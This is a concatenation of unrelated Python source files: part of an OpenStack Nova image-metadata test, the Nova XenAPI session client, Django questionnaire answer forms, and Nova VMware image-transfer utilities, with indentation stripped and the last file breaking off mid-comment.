self.controller.update_all, req, image_id,
body=body)
@mock.patch('nova.image.api.API.get',
side_effect=exception.ImageNotAuthorized(image_id='123'))
def test_image_not_authorized_create(self, _get_mocked):
image_id = 131
# see nova.tests.unit.api.openstack.fakes:_make_image_fixtures
req = fakes.HTTPRequest.blank('/v2/fake/images/%s/metadata/key1'
% image_id)
req.method = 'POST'
body = {"metadata": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPForbidden,
self.controller.create, req, image_id,
body=body)
class ImageMetaDataTestV2(ImageMetaDataTestV21):
controller_class = image_metadata.Controller
invalid_request = webob.exc.HTTPBadRequest
# NOTE(cyeoh): This duplicate unittest is necessary for a race condition
# with the V21 unittests. It's mock issue.
@mock.patch('nova.image.api.API.update')
@mock.patch('nova.image.api.API.get', return_value=get_image_123())
def test_delete(self, _get_mocked, update_mocked):
req = fakes.HTTPRequest.blank('/v2/fake/images/123/metadata/key1')
req.method = 'DELETE'
res = self.controller.delete(req, '123', 'key1')
expected = copy.deepcopy(get_image_123())
expected['properties'] = {}
update_mocked.assert_called_once_with(mock.ANY, '123', expected,
data=None, purge_props=True)
self.assertIsNone(res)
|
|
# Copyright 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import contextlib
try:
import cPickle as pickle
except ImportError:
import pickle
import errno
import socket
import time
from eventlet import queue
from eventlet import timeout
from oslo_log import log as logging
from oslo_utils import versionutils
from six.moves import http_client
from six.moves import range
from six.moves import urllib
try:
import xmlrpclib
except ImportError:
import six.moves.xmlrpc_client as xmlrpclib
import nova.conf
from nova import context
from nova import exception
from nova.i18n import _, _LE, _LW
from nova import objects
from nova import version
from nova.virt.xenapi.client import objects as cli_objects
from nova.virt.xenapi import pool
from nova.virt.xenapi import pool_states
LOG = logging.getLogger(__name__)
CONF = nova.conf.CONF
def apply_session_helpers(session):
session.VM = cli_objects.VM(session)
session.SR = cli_objects.SR(session)
session.VDI = cli_objects.VDI(session)
session.VIF = cli_objects.VIF(session)
session.VBD = cli_objects.VBD(session)
session.PBD = cli_objects.PBD(session)
session.PIF = cli_objects.PIF(session)
session.VLAN = cli_objects.VLAN(session)
session.host = cli_objects.Host(session)
session.network = cli_objects.Network(session)
session.pool = cli_objects.Pool(session)
class XenAPISession(object):
"""The session to invoke XenAPI SDK calls."""
# This is not a config option as it should only ever be
# changed in development environments.
# MAJOR VERSION: Incompatible changes with the plugins
# MINOR VERSION: Compatible changes, new plguins, etc
PLUGIN_REQUIRED_VERSION = '1.8'
def __init__(self, url, user, pw):
version_string = version.version_string_with_package()
self.nova_version = ('%(vendor)s %(product)s %(version)s' %
{'vendor': version.vendor_string(),
'product': version.product_string(),
'version': version_string})
import XenAPI
self.XenAPI = XenAPI
self._sessions = queue.Queue()
self.is_slave = False
self.host_checked = False
exception = self.XenAPI.Failure(_("Unable to log in to XenAPI "
"(is the Dom0 disk full?)"))
self.url = self._create_first_session(url, user, pw, exception)
self._populate_session_pool(url, user, pw, exception)
self.host_uuid = self._get_host_uuid()
self.host_ref = self._get_host_ref()
self.product_version, self.product_brand = \
self._get_product_version_and_brand()
self._verify_plugin_version()
apply_session_helpers(self)
def _login_with_password(self, user, pw, session, exception):
with timeout.Timeout(CONF.xenserver.login_timeout, exception):
session.login_with_password(user, pw,
self.nova_version, 'OpenStack')
def _verify_plugin_version(self):
requested_version = self.PLUGIN_REQUIRED_VERSION
current_version = self.call_plugin_serialized(
'nova_plugin_version.py', 'get_version')
# v2.0 is the same as v1.8, with no version bumps. Remove this once
# Ocata is released
if requested_version == '2.0' and current_version == '1.8':
return
if not versionutils.is_compatible(requested_version, current_version):
raise self.XenAPI.Failure(
_("Plugin version mismatch (Expected %(exp)s, got %(got)s)") %
{'exp': requested_version, 'got': current_version})
def _create_first_session(self, url, user, pw, exception):
try:
session = self._create_session_and_login(url, user, pw, exception)
except self.XenAPI.Failure as e:
# if user and pw of the master are different, we're doomed!
if e.details[0] == 'HOST_IS_SLAVE':
master = e.details[1]
url = pool.swap_xapi_host(url, master)
session = self._create_session_and_login(url, user, pw,
exception)
self.is_slave = True
else:
raise
self._sessions.put(session)
return url
def _populate_session_pool(self, url, user, pw, exception):
for i in range(CONF.xenserver.connection_concurrent - 1):
session = self._create_session_and_login(url, user, pw, exception)
self._sessions.put(session)
def _get_host_uuid(self):
if self.is_slave:
aggr = objects.AggregateList.get_by_host(
context.get_admin_context(),
CONF.host, key=pool_states.POOL_FLAG)[0]
if not aggr:
LOG.error(_LE('Host is member of a pool, but DB '
'says otherwise'))
raise exception.AggregateHostNotFound()
return aggr.metadata[CONF.host]
else:
with self._get_session() as session:
host_ref = session.xenapi.session.get_this_host(session.handle)
return session.xenapi.host.get_uuid(host_ref)
def _get_product_version_and_brand(self):
"""Return a tuple of (major, minor, rev) for the host version and
a string of the product brand.
"""
software_version = self._get_software_version()
product_version_str = software_version.get('product_version')
# Product version is only set in some cases (e.g. XCP, XenServer) and
# not in others (e.g. xenserver-core, XAPI-XCP).
# In these cases, the platform version is the best number to use.
if product_version_str is None:
product_version_str = software_version.get('platform_version',
'0.0.0')
product_brand = software_version.get('product_brand')
product_version = versionutils.convert_version_to_tuple(
product_version_str)
return product_version, product_brand
def _get_software_version(self):
return self.call_xenapi('host.get_software_version', self.host_ref)
def get_session_id(self):
"""Return a string session_id. Used for vnc consoles."""
with self._get_session() as session:
return str(session._session)
@contextlib.contextmanager
def _get_session(self):
"""Return exclusive session for scope of with statement."""
session = self._sessions.get()
try:
yield session
finally:
self._sessions.put(session)
def _get_host_ref(self):
"""Return the xenapi host on which nova-compute runs on."""
with self._get_session() as session:
return session.xenapi.host.get_by_uuid(self.host_uuid)
def call_xenapi(self, method, *args):
"""Call the specified XenAPI method on a background thread."""
with self._get_session() as session:
return session.xenapi_request(method, args)
def call_plugin(self, plugin, fn, args):
"""Call host.call_plugin on a background thread."""
# NOTE(armando): pass the host uuid along with the args so that
# the plugin gets executed on the right host when using XS pools
args['host_uuid'] = self.host_uuid
# TODO(sfinucan): Once the required plugin version is bumped to v2.0,
# we can assume that all files will have a '.py' extension. Until then,
# handle hosts without this extension by rewriting all calls to plugins
# to exclude the '.py' extension. This is made possible through the
# temporary inclusion of symlinks to plugins.
# NOTE(sfinucan): 'partition_utils.py' was the only plugin with a '.py'
# extension before this change was enacted, hence this plugin is
# excluded
if not plugin == 'partition_utils.py':
plugin = plugin.rstrip('.py')
with self._get_session() as session:
return self._unwrap_plugin_exceptions(
session.xenapi.host.call_plugin,
self.host_ref, plugin, fn, args)
def call_plugin_serialized(self, plugin, fn, *args, **kwargs):
params = {'params': pickle.dumps(dict(args=args, kwargs=kwargs))}
rv = self.call_plugin(plugin, fn, params)
return pickle.loads(rv)
def call_plugin_serialized_with_retry(self, plugin, fn, num_retries,
callback, retry_cb=None, *args,
**kwargs):
"""Allows a plugin to raise RetryableError so we can try again."""
attempts = num_retries + 1
sleep_time = 0.5
for attempt in range(1, attempts + 1):
try:
if attempt > 1:
time.sleep(sleep_time)
sleep_time = min(2 * sleep_time, 15)
callback_result = None
if callback:
callback_result = callback(kwargs)
msg = ('%(plugin)s.%(fn)s attempt %(attempt)d/%(attempts)d, '
'callback_result: %(callback_result)s')
LOG.debug(msg,
{'plugin': plugin, 'fn': fn, 'attempt': attempt,
'attempts': attempts,
'callback_result': callback_result})
return self.call_plugin_serialized(plugin, fn, *args, **kwargs)
except self.XenAPI.Failure as exc:
if self._is_retryable_exception(exc, fn):
LOG.warning(_LW('%(plugin)s.%(fn)s failed. '
'Retrying call.'),
{'plugin': plugin, 'fn': fn})
if retry_cb:
retry_cb(exc=exc)
else:
raise
except socket.error as exc:
if exc.errno == errno.ECONNRESET:
LOG.warning(_LW('Lost connection to XenAPI during call to '
'%(plugin)s.%(fn)s. Retrying call.'),
{'plugin': plugin, 'fn': fn})
if retry_cb:
retry_cb(exc=exc)
else:
raise
raise exception.PluginRetriesExceeded(num_retries=num_retries)
def _is_retryable_exception(self, exc, fn):
_type, method, error = exc.details[:3]
if error == 'RetryableError':
LOG.debug("RetryableError, so retrying %(fn)s", {'fn': fn},
exc_info=True)
return True
elif "signal" in method:
LOG.debug("Error due to a signal, retrying %(fn)s", {'fn': fn},
exc_info=True)
return True
else:
return False
def _create_session(self, url):
"""Stubout point. This can be replaced with a mock session."""
self.is_local_connection = url == "unix://local"
if self.is_local_connection:
return self.XenAPI.xapi_local()
return self.XenAPI.Session(url)
def _create_session_and_login(self, url, user, pw, exception):
session = self._create_session(url)
self._login_with_password(user, pw, session, exception)
return session
def _unwrap_plugin_exceptions(self, func, *args, **kwargs):
"""Parse exception details."""
try:
return func(*args, **kwargs)
except self.XenAPI.Failure as exc:
LOG.debug("Got exception: %s", exc)
if (len(exc.details) == 4 and
exc.details[0] == 'XENAPI_PLUGIN_EXCEPTION' and
exc.details[2] == 'Failure'):
params = None
try:
params = ast.literal_eval(exc.details[3])
except Exception:
raise exc
raise self.XenAPI.Failure(params)
else:
raise
except xmlrpclib.ProtocolError as exc:
LOG.debug("Got exception: %s", exc)
raise
def get_rec(self, record_type, ref):
try:
return self.call_xenapi('%s.get_record' % record_type, ref)
except self.XenAPI.Failure as e:
if e.details[0] != 'HANDLE_INVALID':
raise
return None
def get_all_refs_and_recs(self, record_type):
"""Retrieve all refs and recs for a Xen record type.
Handles race-conditions where the record may be deleted between
the `get_all` call and the `get_record` call.
"""
return self.call_xenapi('%s.get_all_records' % record_type).items()
@contextlib.contextmanager
def custom_task(self, label, desc=''):
"""Return exclusive session for scope of with statement."""
name = 'nova-%s' % (label)
task_ref = self.call_xenapi("task.create", name,
desc)
try:
LOG.debug('Created task %s with ref %s' % (name, task_ref))
yield task_ref
finally:
self.call_xenapi("task.destroy", task_ref)
LOG.debug('Destroyed task ref %s' % (task_ref))
@contextlib.contextmanager
def http_connection(session):
conn = None
xs_url = urllib.parse.urlparse(session.url)
LOG.debug("Creating http(s) connection to %s" % session.url)
if xs_url.scheme == 'http':
conn = http_client.HTTPConnection(xs_url.netloc)
elif xs_url.scheme == 'https':
conn = http_client.HTTPSConnection(xs_url.netloc)
conn.connect()
try:
yield conn
finally:
conn.close()
|
|
import copy
from django import forms
from django.forms.util import ErrorDict
from django.forms import ModelForm, ModelChoiceField
from questionnaire.forms.custom_widgets import MultiChoiceAnswerSelectWidget, SkipRuleRadioWidget, MultipleResponseChoiceField
from questionnaire.models import NumericalAnswer, TextAnswer, DateAnswer, MultiChoiceAnswer, QuestionOption
from questionnaire.models.answers import MultipleResponseAnswer
from questionnaire.utils.answer_type import AnswerTypes
from questionnaire.utils.model_utils import number_from
class AnswerForm(ModelForm):
def __init__(self, *args, **kwargs):
super(AnswerForm, self).__init__(*args, **kwargs)
self.question = self._get_question(kwargs)
self.fields['response'].required = self.question.is_required
self._initial = self._set_initial(kwargs)
self.is_editing = False
self._set_instance()
self.question_group = self._initial['group'] if self._initial else None
self.fields['response'].widget.attrs.update({'class': 'input-question-id-%s' % self.question.id})
def _set_initial(self, kwargs):
initial = kwargs['initial'] if 'initial' in kwargs else {}
if self.data and 'response' and self.data.keys():
if 'response' in initial.keys():
del initial['response']
return initial
def _set_instance(self):
if 'answer' in self._initial:
self.is_editing = True
self.instance = self._initial['answer']
def show_is_required_errors(self):
if self.question.is_required and not self.data and not self._initial.get('response', None):
self._errors = self._errors or ErrorDict()
self._errors['response'] = self.error_class(['This field is required.'])
def save(self, commit=True, *args, **kwargs):
if self.is_editing:
return super(AnswerForm, self).save(commit=commit, *args, **kwargs)
return self._create_new_answer(*args, **kwargs)
def _create_new_answer(self, *args, **kwargs):
answer = super(AnswerForm, self).save(commit=False, *args, **kwargs)
self._add_extra_attributes_to(answer)
answer.save()
return answer
def _add_extra_attributes_to(self, answer):
for attribute in self._initial.keys():
setattr(answer, attribute, self._initial[attribute])
def _get_question(self, kwargs):
return kwargs['initial'].get('question', None)
class NumericalAnswerForm(AnswerForm):
ZERO = '0'
NR = 'NR'
ND = 'ND'
class Meta:
model = NumericalAnswer
exclude = ('question', 'status', 'country', 'version', 'code', 'questionnaire', 'old_response')
def clean(self):
self._clean_response()
return super(NumericalAnswerForm, self).clean()
def _clean_response(self):
response = self.cleaned_data.get('response', '').strip()
a_valid_number = number_from(response)
if response and not (response == self.ZERO or response == self.NR or response == self.ND or a_valid_number):
self._errors['response'] = 'Enter a number or Either NR or ND if this question is irrelevant'
elif a_valid_number and self._matches_answer_sub_type(a_valid_number):
self._errors['response'] = "Response should be a whole number."
def _matches_answer_sub_type(self, num):
return AnswerTypes.is_integer(self.question.answer_sub_type) and not float(num).is_integer()
class TextAnswerForm(AnswerForm):
response = forms.CharField(widget=forms.Textarea)
class Meta:
model = TextAnswer
exclude = ('question', 'status', 'country', 'version', 'code', 'questionnaire')
class DateAnswerForm(AnswerForm):
def __init__(self, *args, **kwargs):
super(DateAnswerForm, self).__init__(*args, **kwargs)
self.fields['response'].widget = self._get_date_widget(self._initial['question'].answer_sub_type)
class Meta:
model = DateAnswer
exclude = ('question', 'status', 'country', 'version', 'code', 'questionnaire', 'old_response')
def _get_date_widget(self, date_answer_sub_type):
if date_answer_sub_type == "MM/YYYY":
return forms.DateInput(attrs={'class': 'form-control date-time-picker', 'data-date-format': 'mm/yyyy',
'data-date-option': 'mm'})
else:
return forms.DateInput(attrs={'class': 'form-control date-time-picker input-question-id-%s' % self.question.id, 'data-date-format': 'dd/mm/yyyy',
'data-date-option': 'dd'})
class MultiChoiceAnswerForm(AnswerForm):
response = ModelChoiceField(queryset=None, widget=forms.Select(), required=False)
specified_option = forms.CharField(max_length=50, widget=forms.HiddenInput(), required=False)
def __init__(self, *args, **kwargs):
super(MultiChoiceAnswerForm, self).__init__(*args, **kwargs)
query_set = self._get_response_choices(kwargs)
self.fields['response'].widget = self._get_response_widget(query_set)
self.fields['response'].queryset = query_set
self.fields['response'].empty_label = self._set_response_label(query_set)
self.options = query_set
self._set_data()
def _set_data(self):
if self.data:
new_data = copy.deepcopy(self.data)
self.data = new_data
def _set_response_label(self, query_set):
if self.widget_is_radio_button(query_set) or query_set.count() == 1:
return None
return "Choose One"
def widget_is_radio_button(self, query_set):
group = self._initial['group']
if group.grid:
return False
return query_set.count() == 2 or query_set.filter(text='Yes').exists() or query_set.filter(text='Male').exists()
def _get_response_widget(self, query_set):
if 'option' in self.initial.keys() and self.initial['question'].is_primary:
return forms.Select(attrs={'class': 'hide'})
if self.widget_is_radio_button(query_set):
return SkipRuleRadioWidget(self.question_group.subsection, attrs={'class': 'input-question-id-%s' % self.question.id})
if query_set.exclude(instructions=None).exists() or query_set.exclude(skip_rules=None).exists():
return MultiChoiceAnswerSelectWidget(self.question_group.subsection, question_options=query_set, attrs={'class': 'input-question-id-%s' % self.question.id})
return forms.Select(attrs={'class': 'input-question-id-%s' % self.question.id})
def _get_response_choices(self, kwargs):
all_options = self.question.options.order_by('order')
if 'option' in self._initial:
return all_options.filter(id=self._initial.get('option').id).order_by('order')
return all_options.order_by('order')
def save(self, commit=True, *args, **kwargs):
answer = super(MultiChoiceAnswerForm, self).save(commit=False, *args, **kwargs)
self._save_specified_option_to(answer)
if commit:
answer.save()
return answer
def _save_specified_option_to(self, answer):
specified_option = self.cleaned_data.get('specified_option', None)
if specified_option:
UID = QuestionOption.generate_uid()
new_option, _ = self.question.options.get_or_create(text=specified_option, UID=UID)
answer.response = new_option
self.data[self.add_prefix('response')] = new_option.id
class Meta:
model = MultiChoiceAnswer
exclude = ('question', 'status', 'country', 'version', 'code', 'questionnaire')
class MultipleResponseForm(AnswerForm):
response = MultipleResponseChoiceField(queryset=None, widget=forms.CheckboxSelectMultiple(), required=False, )
def __init__(self, *args, **kwargs):
super(MultipleResponseForm, self).__init__(*args, **kwargs)
options_all = self.question.options.all()
self.fields['response'].queryset = options_all
self.options = options_all
class Meta:
model = MultipleResponseAnswer
exclude = ('question', 'status', 'country', 'version', 'code', 'questionnaire')
def _clean_response(self):
response = self.cleaned_data.get('response', [])
selected_options = [option in self.options for option in response]
if len(response) != selected_options.count(True):
message = 'Select a valid choice. The selected option is not one of the available choices.'
self._errors['response'] = self.error_class([message])
def clean(self):
self._clean_response()
return super(MultipleResponseForm, self).clean()
def save(self, commit=True, *args, **kwargs):
answer = super(MultipleResponseForm, self).save(commit=False, *args, **kwargs)
answer.save()
if commit:
self.save_m2m()
return answer
|
|
# Copyright (c) 2012 VMware, Inc.
# Copyright (c) 2011 Citrix Systems, Inc.
# Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Utility functions for Image transfer and manipulation.
"""
import os
import tarfile
import tempfile
from lxml import etree
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import strutils
from oslo_utils import units
from oslo_vmware import rw_handles
from nova import exception
from nova.i18n import _, _LE, _LI
from nova import image
from nova.virt.vmwareapi import constants
from nova.virt.vmwareapi import io_util
# NOTE(mdbooth): We use use_linked_clone below, but don't have to import it
# because nova.virt.vmwareapi.driver is imported first. In fact, it is not
# possible to import it here, as nova.virt.vmwareapi.driver calls
# CONF.register_opts() after the import chain which imports this module. This
# is not a problem as long as the import order doesn't change.
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
IMAGE_API = image.API()
QUEUE_BUFFER_SIZE = 10
LINKED_CLONE_PROPERTY = 'vmware_linked_clone'
class VMwareImage(object):
def __init__(self, image_id,
file_size=0,
os_type=constants.DEFAULT_OS_TYPE,
adapter_type=constants.DEFAULT_ADAPTER_TYPE,
disk_type=constants.DEFAULT_DISK_TYPE,
container_format=constants.CONTAINER_FORMAT_BARE,
file_type=constants.DEFAULT_DISK_FORMAT,
linked_clone=None,
vif_model=constants.DEFAULT_VIF_MODEL):
"""VMwareImage holds values for use in building VMs.
image_id (str): uuid of the image
file_size (int): size of file in bytes
os_type (str): name of guest os (use vSphere names only)
adapter_type (str): name of the adapter's type
disk_type (str): type of disk in thin, thick, etc
container_format (str): container format (bare or ova)
file_type (str): vmdk or iso
linked_clone(bool): use linked clone, or don't
"""
self.image_id = image_id
self.file_size = file_size
self.os_type = os_type
self.adapter_type = adapter_type
self.container_format = container_format
self.disk_type = disk_type
self.file_type = file_type
# NOTE(vui): This should be removed when we restore the
# descriptor-based validation.
if (self.file_type is not None and
self.file_type not in constants.DISK_FORMATS_ALL):
raise exception.InvalidDiskFormat(disk_format=self.file_type)
if linked_clone is not None:
self.linked_clone = linked_clone
else:
self.linked_clone = CONF.vmware.use_linked_clone
self.vif_model = vif_model
@property
def file_size_in_kb(self):
return self.file_size / units.Ki
@property
def is_sparse(self):
return self.disk_type == constants.DISK_TYPE_SPARSE
@property
def is_iso(self):
return self.file_type == constants.DISK_FORMAT_ISO
@property
def is_ova(self):
return self.container_format == constants.CONTAINER_FORMAT_OVA
@classmethod
def from_image(cls, image_id, image_meta=None):
"""Returns VMwareImage, the subset of properties the driver uses.
:param image_id - image id of image
:param image_meta - image metadata we are working with
:return: vmware image object
:rtype: nova.virt.vmwareapi.images.VmwareImage
"""
if image_meta is None:
image_meta = {}
properties = image_meta.get("properties", {})
# calculate linked_clone flag, allow image properties to override the
# global property set in the configurations.
image_linked_clone = properties.get(LINKED_CLONE_PROPERTY,
CONF.vmware.use_linked_clone)
# catch any string values that need to be interpreted as boolean values
linked_clone = strutils.bool_from_string(image_linked_clone)
props = {
'image_id': image_id,
'linked_clone': linked_clone,
'container_format': image_meta.get('container_format')
}
if 'size' in image_meta:
props['file_size'] = image_meta['size']
if 'disk_format' in image_meta:
props['file_type'] = image_meta['disk_format']
props_map = {
'vmware_ostype': 'os_type',
'vmware_adaptertype': 'adapter_type',
'vmware_disktype': 'disk_type',
'hw_vif_model': 'vif_model'
}
for k, v in props_map.iteritems():
if k in properties:
props[v] = properties[k]
return cls(**props)
def start_transfer(context, read_file_handle, data_size,
write_file_handle=None, image_id=None, image_meta=None):
"""Start the data transfer from the reader to the writer.
Reader writes to the pipe and the writer reads from the pipe. This means
that the total transfer time boils down to the slower of the read/write
and not the addition of the two times.
"""
if not image_meta:
image_meta = {}
# The pipe that acts as an intermediate store of data for reader to write
# to and writer to grab from.
thread_safe_pipe = io_util.ThreadSafePipe(QUEUE_BUFFER_SIZE, data_size)
# The read thread. In case of glance it is the instance of the
# GlanceFileRead class. The glance client read returns an iterator
# and this class wraps that iterator to provide datachunks in calls
# to read.
read_thread = io_util.IOThread(read_file_handle, thread_safe_pipe)
# In case of Glance - VMware transfer, we just need a handle to the
# HTTP Connection that is to send transfer data to the VMware datastore.
if write_file_handle:
write_thread = io_util.IOThread(thread_safe_pipe, write_file_handle)
# In case of VMware - Glance transfer, we relinquish VMware HTTP file read
# handle to Glance Client instance, but to be sure of the transfer we need
# to be sure of the status of the image on glance changing to active.
# The GlanceWriteThread handles the same for us.
elif image_id:
write_thread = io_util.GlanceWriteThread(context, thread_safe_pipe,
image_id, image_meta)
# Start the read and write threads.
read_event = read_thread.start()
write_event = write_thread.start()
try:
# Wait on the read and write events to signal their end
read_event.wait()
write_event.wait()
except Exception as exc:
# In case of any of the reads or writes raising an exception,
# stop the threads so that we un-necessarily don't keep the other one
# waiting.
read_thread.stop()
write_thread.stop()
# Log and raise the exception.
LOG.exception(_LE('Transfer data failed'))
raise exception.NovaException(exc)
finally:
# No matter what, try closing the read and write handles, if it so
# applies.
read_file_handle.close()
if write_file_handle:
write_file_handle.close()
def upload_iso_to_datastore(iso_path, instance, **kwargs):
LOG.debug("Uploading iso %s to datastore", iso_path,
instance=instance)
with open(iso_path, 'r') as iso_file:
write_file_handle = rw_handles.FileWriteHandle(
kwargs.get("host"),
kwargs.get("port"),
kwargs.get("data_center_name"),
kwargs.get("datastore_name"),
kwargs.get("cookies"),
kwargs.get("file_path"),
os.fstat(iso_file.fileno()).st_size)
LOG.debug("Uploading iso of size : %s ",
os.fstat(iso_file.fileno()).st_size)
block_size = 0x10000
data = iso_file.read(block_size)
while len(data) > 0:
write_file_handle.write(data)
data = iso_file.read(block_size)
write_file_handle.close()
LOG.debug("Uploaded iso %s to datastore", iso_path,
instance=instance)
def fetch_image(context, instance, host, port, dc_name, ds_name, file_path,
cookies=None):
"""Download image from the glance image server."""
image_ref = instance.image_ref
LOG.debug("Downloading image file data %(image_ref)s to the "
"data store %(data_store_name)s",
{'image_ref': image_ref,
'data_store_name': ds_name},
instance=instance)
metadata = IMAGE_API.get(context, image_ref)
file_size = int(metadata['size'])
read_iter = IMAGE_API.download(context, image_ref)
read_file_handle = rw_handles.ImageReadHandle(read_iter)
write_file_handle = rw_handles.FileWriteHandle(
host, port, dc_name, ds_name, cookies, file_path, file_size)
start_transfer(context, read_file_handle, file_size,
write_file_handle=write_file_handle)
LOG.debug("Downloaded image file data %(image_ref)s to "
"%(upload_name)s on the data store "
"%(data_store_name)s",
{'image_ref': image_ref,
'upload_name': 'n/a' if file_path is None else file_path,
'data_store_name': 'n/a' if ds_name is None else ds_name},
instance=instance)
def _build_shadow_vm_config_spec(session, name, size_kb, disk_type, ds_name):
"""Return spec for creating a shadow VM for image disk.
The VM is never meant to be powered on. When used in importing
a disk it governs the directory name created for the VM
and the disk type of the disk image to convert to.
:param name: Name of the backing
:param size_kb: Size in KB of the backing
:param disk_type: VMDK type for the disk
:param ds_name: Datastore name where the disk is to be provisioned
:return: Spec for creation
"""
cf = session.vim.client.factory
controller_device = cf.create('ns0:VirtualLsiLogicController')
controller_device.key = -100
controller_device.busNumber = 0
controller_device.sharedBus = 'noSharing'
controller_spec = cf.create('ns0:VirtualDeviceConfigSpec')
controller_spec.operation = 'add'
controller_spec.device = controller_device
disk_device = cf.create('ns0:VirtualDisk')
# for very small disks allocate at least 1KB
disk_device.capacityInKB = max(1, int(size_kb))
disk_device.key = -101
disk_device.unitNumber = 0
disk_device.controllerKey = -100
disk_device_bkng = cf.create('ns0:VirtualDiskFlatVer2BackingInfo')
if disk_type == constants.DISK_TYPE_EAGER_ZEROED_THICK:
disk_device_bkng.eagerlyScrub = True
elif disk_type == constants.DISK_TYPE_THIN:
disk_device_bkng.thinProvisioned = True
disk_device_bkng.fileName = '[%s]' % ds_name
disk_device_bkng.diskMode = 'persistent'
disk_device.backing = disk_device_bkng
disk_spec = cf.create('ns0:VirtualDeviceConfigSpec')
disk_spec.operation = 'add'
disk_spec.fileOperation = 'create'
disk_spec.device = disk_device
vm_file_info = cf.create('ns0:VirtualMachineFileInfo')
vm_file_info.vmPathName = '[%s]' % ds_name
create_spec = cf.create('ns0:VirtualMachineConfigSpec')
create_spec.name = name
create_spec.guestId = 'otherGuest'
create_spec.numCPUs = 1
create_spec.memoryMB = 128
create_spec.deviceChange = [controller_spec, disk_spec]
create_spec.files = vm_file_info
return create_spec
def _build_import_spec_for_import_vapp(session, vm_name, datastore_name):
vm_create_spec = _build_shadow_vm_config_spec(
session, vm_name, 0, constants.DISK_TYPE_THIN, datastore_name)
client_factory = session.vim.client.factory
vm_import_spec = client_factory.create('ns0:VirtualMachineImportSpec')
vm_import_spec.configSpec = vm_create_spec
return vm_import_spec
def fetch_image_stream_optimized(context, instance, session, vm_name,
ds_name, vm_folder_ref, res_pool_ref):
"""Fetch image from Glance to ESX datastore."""
image_ref = instance.image_ref
LOG.debug("Downloading image file data %(image_ref)s to the ESX "
"as VM named '%(vm_name)s'",
{'image_ref': image_ref, 'vm_name': vm_name},
instance=instance)
metadata = IMAGE_API.get(context, image_ref)
file_size = int(metadata['size'])
vm_import_spec = _build_import_spec_for_import_vapp(
session, vm_name, ds_name)
read_iter = IMAGE_API.download(context, image_ref)
read_handle = rw_handles.ImageReadHandle(read_iter)
write_handle = rw_handles.VmdkWriteHandle(session,
session._host,
session._port,
res_pool_ref,
vm_folder_ref,
vm_import_spec,
file_size)
start_transfer(context,
read_handle,
file_size,
write_file_handle=write_handle)
imported_vm_ref = write_handle.get_imported_vm()
LOG.info(_LI("Downloaded image file data %(image_ref)s"),
{'image_ref': instance.image_ref}, instance=instance)
session._call_method(session.vim, "UnregisterVM", imported_vm_ref)
LOG.info(_LI("The imported VM was unregistered"), instance=instance)
def get_vmdk_name_from_ovf(xmlstr):
"""Parse the OVA descriptor to extract the vmdk name."""
ovf = etree.fromstring(xmlstr)
nsovf = "{%s}" % ovf.nsmap["ovf"]
disk = ovf.find("./%sDiskSection/%sDisk" % (nsovf, nsovf))
file_id = disk.get("%sfileRef" % nsovf)
file = ovf.find('./%sReferences/%sFile[@%sid="%s"]' % (nsovf, nsovf,
nsovf, file_id))
vmdk_name = file.get("%shref" % nsovf)
return vmdk_name
def fetch_image_ova(context, instance, session, vm_name, ds_name,
vm_folder_ref, res_pool_ref):
"""Download the OVA image from the glance image server to the
Nova compute node.
"""
image_ref = instance.image_ref
LOG.debug("Downloading OVA image file %(image_ref)s to the ESX "
"as VM named '%(vm_name)s'",
{'image_ref': image_ref, 'vm_name': vm_name},
instance=instance)
metadata = IMAGE_API.get(context, image_ref)
file_size = int(metadata['size'])
vm_import_spec = _build_import_spec_for_import_vapp(
session, vm_name, ds_name)
read_iter = IMAGE_API.download(context, image_ref)
ova_fd, ova_path = tempfile.mkstemp()
try:
# NOTE(arnaud): Look to eliminate first writing OVA to file system
with os.fdopen(ova_fd, 'w') as fp:
for chunk in read_iter:
fp.write(chunk)
with tarfile.open(ova_path, mode="r") as tar:
vmdk_name = None
for tar_info in tar:
if tar_info and tar_info.name.endswith(".ovf"):
extracted = tar.extractfile(tar_info.name)
xmlstr = extracted.read()
vmdk_name = get_vmdk_name_from_ovf(xmlstr)
elif vmdk_name and tar_info.name.startswith(vmdk_name):
# Actual file name is <vmdk_name>.XXXXXXX
extracted = tar.extractfile(tar_info.name)
write_handle = rw_handles.VmdkWriteHandle(
session,
session._host,
session._port,
res_pool_ref,
vm_folder_ref,
vm_import_spec,
file_size)
start_transfer(context,
extracted,
file_size,
write_file_handle=write_handle)
extracted.close()
LOG.info(_LI("Downloaded OVA image file %(image_ref)s"),
{'image_ref': instance.image_ref}, instance=instance)
imported_vm_ref = write_handle.get_imported_vm()
session._call_method(session.vim, "UnregisterVM",
imported_vm_ref)
LOG.info(_LI("The imported VM was unregistered"),
instance=instance)
return
raise exception.ImageUnacceptable(
reason=_("Extracting vmdk from OVA failed."),
image_id=image_ref)
finally:
os.unlink(ova_path)
def upload_image_stream_optimized(context, image_id, instance, session,
vm, vmdk_size):
"""Upload the snapshotted vm disk file to Glance image server."""
LOG.debug("Uploading image %s", image_id, instance=instance)
metadata = IMAGE_API.get(context, image_id)
read_handle = rw_handles.VmdkReadHandle(session,
session._host,
session._port,
vm,
None,
vmdk_size)
# Set the image properties. It is important to set the 'size' to 0.
# Otherwise, the image service client will use the VM's disk capacity
# which will not be the image size after upload, since it is converted
# to a stream-optimized sparse disk.
image_metadata = {'disk_format': 'vmdk',
'is_public': metadata['is_public'],
'name': metadata['name'],
'status': 'active',
'container_format': 'bare',
'size': 0,
'properties': {'vmware_image_version': 1,
'vmware_disktype': 'streamOptimized',
'owner_id': instance.project_id}}
# Passing 0 as the file size since data size to be transferred cannot be
